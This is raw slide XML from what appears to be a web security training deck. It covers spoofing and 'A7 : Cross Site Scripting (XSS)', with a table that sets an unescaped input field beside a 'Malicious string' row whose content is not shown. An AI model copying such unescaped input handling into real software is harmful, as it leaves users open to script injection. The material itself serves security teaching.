            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1316285" cy="5463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57" y="6217"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16585" y="3056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="5584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="9378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21383" y="11696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="12960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="16437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16476" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16693" y="15700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16657" y="6217"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="658" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="65475" y="679591"/>
              <a:ext cx="1316286" cy="5463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57" y="6217"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16585" y="3056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="5584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="9378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21383" y="11696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="12960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="16437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16476" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16693" y="15700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16657" y="6217"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="662" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7820941" y="5019040"/>
            <a:ext cx="1381762" cy="1225974"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1381760" cy="1225973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="660" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1316285" cy="5463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57" y="6217"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16585" y="3056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="5584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="9378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21383" y="11696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="12960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="16437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16476" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16693" y="15700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16657" y="6217"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="661" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="65475" y="679591"/>
              <a:ext cx="1316286" cy="5463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57" y="6217"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16585" y="3056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="5584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="9378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21383" y="11696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20803" y="12960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19047" y="16437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16476" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16693" y="15700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16657" y="6217"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Convince User you…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3235126" y="7053298"/>
            <a:ext cx="1998673"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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>Convince User you</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>are www.IBuySpy.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Convince www.IBuySpy.com…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7172442" y="3517617"/>
            <a:ext cx="2561355"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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>Convince www.IBuySpy.com</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>you are User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656"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="656"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65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xit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="648"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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659"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="659"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="659"/>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662"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="662"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="662"/>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Class="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="663"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetClass="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="664"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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3" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="648" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="662" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="664" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="651" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="659" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="656" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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76" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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8" name="A7 : Cross Site Scripting (XSS)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A7 : Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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81" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1684" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="677947" y="1264355"/>
          <a:ext cx="11992822" cy="7224890"/>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3391700"/>
                <a:gridCol w="8601120"/>
              </a:tblGrid>
              <a:tr h="2408296">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Application code</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101600" marR="101600" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="A6A6A6"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>&lt;input value="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>userInput</a:t>
                      </a:r>
                      <a:r>
                        <a:t>"&gt;</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2408296">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Malicious string</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101600" marR="101600" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="A6A6A6"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400"/>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:solidFill>
